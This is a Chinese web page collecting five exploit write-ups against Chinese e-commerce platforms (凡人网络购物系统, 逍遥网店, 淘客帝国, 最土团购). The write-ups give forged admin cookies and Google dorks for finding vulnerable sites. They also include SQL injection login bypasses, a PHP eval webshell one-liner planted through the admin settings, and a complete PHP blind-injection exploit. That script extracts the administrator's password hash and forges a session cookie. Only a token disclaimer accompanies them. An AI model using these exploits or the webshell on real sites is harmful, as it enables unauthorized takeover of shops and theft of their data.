欢迎来到个人简历网!永久域名:gerenjianli.cn (个人简历全拼+cn)
当前位置:首页 > 范文大全 > 实用文>凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用

2023-06-13 08:40:21 收藏本文 下载本文

“四不空小尼姑”通过精心收集,向本站投稿了5篇凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用,下面就是小编给大家带来的凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用,希望大家喜欢,可以帮助到有需要的朋友!

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用

篇1:凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用

ad_chk.asp判断管理员登陆状态

<%

if Request.Cookies(“venshop”)(“admin_name”)=“” or Request.Cookies(“venshop”)(“admin_pass”)=“” or Request.Cookies(“venshop”)(“admin_class”)=“” then

Response.Cookies(“venshop”)(“admin_name”)=“”

Response.Cookies(“venshop”)(“admin_pass”)=“”

Response.Cookies(“venshop”)(“admin_class”)=“”

response.redirect “ad_login.asp”

response.end

end if

%>

判断admin_class

C:\Inetpub\wwwroot>findstr /i /n /s “admin_class” *.asp

ad_admin.asp:29: rs(“admin_class”)=request(“class1”)

ad_admin.asp:43:rs(“admin_class”)=request(“class”)

ad_admin.asp:92:<%if rs(“admin_class”)=0 then response.write“ s

elected”%>>总管理员

ad_admin.asp:93:<%if rs(“admin_class”)=1 then response.write“ s

elected”%>>产品管理

ad_admin.asp:94:<%if rs(“admin_class”)=2 then response.write“ s

elected”%>>订单管理

........................

可以看出当admin_class=0的时候就是总管理员身份了,

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用

伪造cookie如下

Themes=default; Count=lao=3; Countecho=lao=True; ASPSESSIONIDQAADRSRB=CDBDHEHCLJOIHFDAHLFHABIO; venshop=admin%5Fclass=0&admin%5Fpass=admin&admin%5Fname=admin

然后访问即可,后台有数据库备份可以拿webshell。

google :inurl:“views.asp?hw_id=”

篇2:凡人网络购物系统Jsp版漏洞分析

凡人网络购物系统Jsp版是网上少见的JSP开源的程序,说实话JSP的程序确实很少,

这套系统已经 被很多人改过了,所以只能用文件来试是不是这个系统,..数据库是ACCESS难得,以前学校写都是用SQL..所以JDBC那里很熟悉

这文章也没有投稿的价值.. 俺还有更好的文章投稿,所以这个就发出来玩了,代码漏洞百出。看的我都想吐了 有兴趣的朋友自己去下一份最新版的来看

正文:

现在虽然渗透的方法多彩多样,但是最具威胁最简单的还是injection攻击. 对于 injection漏洞的形成无非就是某某变量

没过滤或者过滤不严而已..

这几天一直在看凡人网络购物系统Jsp版的代码。 多少看出来点问题。这里共享下..

这套系统网上使用的并不是很多,但是大部分人喜欢改这套程序来用,所以我只是在笔记本上装了个tomcat环境来测试一下这个漏洞

因为不投稿所以也没截图 只把漏洞代码简单说下

首先看一下就简单的JSP注射漏洞的形成,我从我们教材上随便找了一个后台登陆的代码来分析

现在的学校培训程序员只知道让写代码。对编码安全根本没有意识...

教材上的后台代码:

Statement stmt = conn.createStatement;

string checkUser = “select * from login where username =' ”+userName + “' and userpassword ='”+userPassword + “ ' ”;

ResultSet rs = stmt.executeQuery(checkUser); //执行查询

if(rs.next())

response.sendRedirect(“SuccessLogin.jsp”);

else

response,sendRedirect(“FailureLogin.jsp”);

上边是一个正常的JSP登陆页面 . 但是userName跟userPassword都没有过滤直接就放到数据库中进行查询,存在典型的注射漏洞

如果我们知道数据库里有个admin的用户 那么我们就可以用or'a'='a 或者 'or1=1/*进行登陆而不用输入密码登陆。

现在我们来看看凡人网络购物系统Jsp版的登陆页面login.jsp..代码如下,

<%@ page contentType=“text/html;charset=GBK” language=“java” import=“java.sql.*,java.util.Date” errorPage=“” %>

<%

boolean foundeer=false;

String user_name,user_pass;

if(!foundeer){

if (session.getAttribute(“user_name”)==null){ //只判断是否为空,并未进行过滤

user_name=request.getParameter(“user_name”);

user_pass=request.getParameter(“user_pass”);

if(user_name==null || user_pass==null){

out.print(“用户名和用户密码不能为空!”);

foundeer=true;

}

String sql=“select * from member where user_name='”+user_name+“'”;

ResultSet rs;

rs=mdb.executeQuery(sql);

以下省略

...

}

我们从

if (session.getAttribute(“user_name”)==null){

user_name=request.getParameter(“user_name”);

user_pass=request.getParameter(“user_pass”);

if(user_name==null || user_pass==null){

out.print(“用户名和用户密码不能为空!”);

foundeer=true;

}

String sql=“select * from member where user_name='”+user_name+“'”;

ResultSet rs;

rs=mdb.executeQuery(sql);

这里可以看到, 只判断了user_name是否为空,并没有进行有效的过滤,导致注射漏洞的发生,如果让select成功,就能成功饶过验证. 算是一个典型的or 注入

先用or 1=1和or 1=2来测试是否存在注入点,我在本地测试是成功的..在本本上我没法截图 然后继续 or exists(select XX from XX)返回or 1=1的页面,这里没什么可说的... 不懂的可以去看鸡头的那个新or 注入 讲 的很明白的...

其实这太系统简直是漏洞百出,还一个跨站的漏洞,在留言那里限制是10个字符,

但是我们可以本地写个表单来提交就可以成功跨站的,代码我就不发了。 稍微懂点JSP的都能看出来。

篇3:正版逍遥网店系统 V3.0 COOKIE欺骗漏洞漏洞预警

OK开始,这是一个网店,本来我想先找注入,貌似注入都过滤了,于是我又来到后台,看了下检测文件,悲剧由此产生:

漏洞文件:checkadmin.asp

<%

if request.cookies(“buyok”)(“admin”)=“” then response.write “

%>

大家看到这里一定以为很简单吧,呵呵 直接COOKIE欺骗就可以进后台,如果真的这样我就不发了~!留个悬念让大家去试试。

然后我进入后台,127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。

index.asp

网店后台管理

此网页使用了框架,但您的浏览器不支持框架,

看到这里我奇怪了,是调用checkadmin.asp啊 为什么进不了后台。我看到了main.asp。

继续跟进。代码就不发了免得多,最后发现了一个文件。

漏洞文件:include\buyok_functions.asp

下面贴出部分代码:

set rscheck=conn.execute(“select * from buyok_user where UserId='”&request.cookies(“buyok”)(“userid”)&“'”)

if rscheck.eof and rscheck.bof then

response.write “”

response.end

看到这里大家都懂了吧 呵呵~!

OK附上EXP:

KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=admin;

修改COOKIE 然后直接进入127.0.0.1/admin/index.asp.

后台:localhost/admin/login.asp

作者:风之传说

篇4:淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警

偶然发现的淘客帝国免费版的后台可以cookie欺骗

工具:  老兵的cookie'欺骗工具

关键字: 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品

首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ,然后再工具的地址栏那里输入网站的后台(默认后台/admin)等页面全部出来后再在后台目录后加上manage.php 跳转就可以进入后台了,进入后台后怎么样拿shell就简单了,这里就不说了..

补下代码【anfli 补】

getshell 简单 系统配置 {${@eval($_POST['cmd'])}} 一句话连接地址/data/configdata.php

顺便补一下代码===================|The End}

##admin目录下php 部验证##

--------------------main.php

require_once '../include/adminfunction.php';

checkadmin;

---------------------/include/sysfunction.php

#####

function checkadmin(){

global $COOKIEadminuser;

global $sitetitleurl;

//判断

if( (isset($_COOKIE['COOKIEadminuser']) && $_COOKIE['COOKIEadminuser']!=“”) || (isset($_SESSION['adminuser']) && $_SESSION['adminuser']!=“”) ){

} else {

echo(“”);

exit;

}

一看就懂

$_COOKIE['COOKIEadminuser']!=“” 只要不为空就ok

//index.php 一看到这里就知道 程序员自己催眠了自己 登出就把adminuser 清空 .........COOKIEadminuser是干神马的?

/admin/index.php 是不会通过验证 但是如果访问/admin/manage.php 的话一样ok 也就lz所谓的偶然发现了 COOKIEadminuser 并没有空

if($action==“loginout”){

$_SESSION['adminuser'] = “”;

SetCookie(“adminuser”, “”);

redirect_to($sitetitleurl);

其实所有审计过程 是倒序

篇5:最土团购系统盲注及cookie欺骗漏洞漏洞预警

最土团购系统是国内著名团购程序,在国内团购系统份额中所占比例很大,但因有些版本某些地方过滤不完全导致注射漏洞(非通杀)。

查找方式

powered by zuitu

漏洞分析

1.注入漏洞

首先看一下全局核心文件app.php代码:

管理员 $login_user = Table::Fetch('user', $login_user_id);追踪GetLoginId方法:static public function GetLoginId() {        $user_id = abs(intval(Session::Get('user_id')));        if (!$user_id) {            $u = ZUser::GetLoginCookie(self::$cookie_name); //调用cookie            $user_id = abs(intval($u['id']));        }        if ($user_id) self::Login($user_id);        return $user_id;    }     static public function GetLoginCookie($cname='ru') {        $cv = cookieget($cname); //获取cookie值        if ($cv) {            $zone = base64_decode($cv); //对cookie值base64解密            $p = explode('@', $zone, 2); //用@分隔成数组            return DB::GetTableRow('user', array(  //进入user表查询                'id' =>$p[0], //第一部分为id,默认超级管理员id为1                'password' =>$p[1],  //第二部分为加密后的密码hash            ));        }        return Array();    }    /*cookie获得方式*/     function cookieget($k, $default='') {    $pre = substr(md5($_SERVER['HTTP_HOST']),0,4);    $k = “{$pre}_{$k}”;    return isset($_COOKIE[$k]) ? strval($_COOKIE[$k]) : $default; }

真正用到的参数是id,password的hash。密码学告诉我们解密的关键是密钥,而不是算法,那通过注入我们掌握了id和password直接cookie欺骗,以管理员身份登录。由于后台需要二次登录,所以思路是我们在前台用超级管理员欺骗登陆后,pass掉管理员密码,登录后台。

说了很多废话,整合两个漏洞,最后上exp:

< 3) { print_r(' -------------------------------------------------------+    Example:        php.exe exp.php localhost password                                --l4yn3 -------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; //域名 $param = $argv[2]; //注入字段 username or password $res = ''; for($i=1;$i<=32;$i++) {    $find_str = blindExp($i);    if($find_str == '~')break;    echo “The $i word: $find_str\n”;    $res .= $find_str; } if(empty($res)) {    print('Exploited failed!');    exit; } print_r(“        The $param is $res\n                        I'm trying to login the website,wait...... ”); $session_id = sharpLogin($argv[1], $res); print_r(' Login completely! The PHPSESSID is '.$session_id.'! Please copy the command \'javascript.:alert(document.cookie=\'PHPSESSID='.$session_id.'\');\' to the widow which the '.$host.' is opened, then reload the window!                                                    Good Luck!                                                            ----l4yn3                                                            '); exit; /*信息刺探*/ function getData($i, $count) {    global $host, $param;    $url = “$host/ajax/coupon.php?action=consume&id=--9876')%20or%20exists(select%20*%20from%20user%20where%20manager='Y'%20and%20ord(substring($param,$i,1))>$count%20and%20id=1%20order%20by%20id%20desc%20limit%201)--%20sdf”; //14561      $remove_data = @file_get_contents($url);    if(!strstr($remove_data, '--9876'))    {        return 1;    }    return 0; } /*账号和密码猜解*/ function blindExp($pos) {    $counter_min = 20;    $counter_max = 128;    $counter_middel = 0;    $res = '';    $i = 0;    while($i <=10)    {        $counter_middel = ($counter_max + $counter_min) / 2;        $res = getData($pos, $counter_middel);        if(empty($res))        {            $counter_max = floor($counter_middel);        }        else        {            $counter_min = ceil($counter_middel);        }        if($counter_max == $counter_min && $counter_max != 20)        {            $res = chr($counter_max);            break;        }        $i++;    }    return preg_match('/[\d\S]/', $res) ? $res : '~'; } /*伪造cookie*/ function sharpLogin($host = '', $password = '') {    $time = time() + 3600 * 24 *30;    $key = substr(md5($host), 0, 4);    $cookie_key = $key.“_ru”;    $cookie_val = base64_encode('1@'.$password

);    $data = '';    $data .= “GET /index.php HTTP/1.1\r\n”;    $data .= “Host: $host\r\n”;    $data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n”;    $data .= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n”;    $data .= “Cookie: {$cookie_key}_city=1; cnzz_a2262318=3; sin2262318=; rtime=0; ltime=$time; cnzz_eid=19056328-1285688892-; $cookie_key=$cookie_val\r\n”;    $data .= “Connection: Close\r\n\r\n”;    $fp = fsockopen($host, 80);    fputs($fp, $data);    $res = '';    while($fp && !feof($fp))    {        $res .= fread($fp, 1024);    }    fclose($fp);    $session_id = getSessionId($res);    if($session_id)return $session_id;    else return false; } /*获取sessionid*/ function getSessionId($data) {    preg_match(“/PHPSESSID=([\d\w]+);/iU”, $data, $match);    if(isset($match[1]))    {        return $match[1];    }    return ''; }

exp返回如下代码:

The PHPSESSID is 9fb4dff8d28c07aa4e2a6ea67f7ed2ab! Please copy the command 'javascript.:alert(document.cookie='PHPSESSID=9fb4dff8d28c07aa4e2a6ea67f7ed2ab'); ' to the widow which the www.abc.com is opened, then reload the window!拷贝'javascript.:alert(document.cookie='PHPSESSID=9fb4dff8d28c07aa4e2a6ea67f7ed2ab');到打开当前网站的浏览器窗口输入栏,回车,刷新,即登录成功,

请勿用于非法用途,仅用于技术交流。

【凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用】相关文章:

1.稻草人企业站管理系统宽字节注入漏洞利用漏洞预警

下载word文档
《凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度: 评级1星 评级2星 评级3星 评级4星 评级5星
点击下载文档

文档为doc格式

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用相关文章
最新推荐
猜你喜欢
  • 返回顶部